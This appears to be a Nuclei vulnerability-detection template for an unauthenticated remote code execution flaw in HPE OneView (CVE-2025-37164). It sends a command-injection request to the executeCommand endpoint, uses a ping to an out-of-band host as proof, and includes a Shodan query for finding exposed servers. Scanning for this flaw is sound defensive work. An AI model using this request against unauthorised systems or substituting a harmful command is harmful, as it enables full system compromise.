id: CVE-2025-37164

info:
  name: HPE OneView - Remote Code Execution
  author: DhiyaneshDk,garciaizcoa
  severity: critical
  description: |
    HPE OneView contains a remote code execution vulnerability, letting remote attackers execute arbitrary code.
  impact: |
    Remote attackers can execute arbitrary code, potentially leading to full system compromise.
  remediation: |
    Update to the latest version.
  reference:
    - https://attackerkb.com/topics/ixWdbDvjwX/cve-2025-37164/rapid7-analysis
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"HPE" html:"OneView"
  tags: cve,cve2025,hpe,oneview,rce,vkev,kev

http:
  - raw:
      - |
        GET /rest/version HTTP/1.1
        Host: {{Hostname}}

      - |
        PUT /rest/id-pools/executeCommand HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-API-Version: {{apiversion}}
        Accept-Encoding: gzip
        {
        "cmd":"ping -c 2 {{interactsh-url}}",
        "result":0
        }

    extractors:
      - type: json
        part: body
        name: apiversion
        internal: true
        json:
          - '.currentVersion'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "ExecutableCommand"

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022056d7db495c46aa418e0207e1e11512d4f7da23e084142b7306131b3b37130d52022100fcfa6cd6c9ef141dcbd5e00d58ba5a623e378e20f0315b705f12f4301d5b4cce:922c64590222798bb761d5b6d8e72950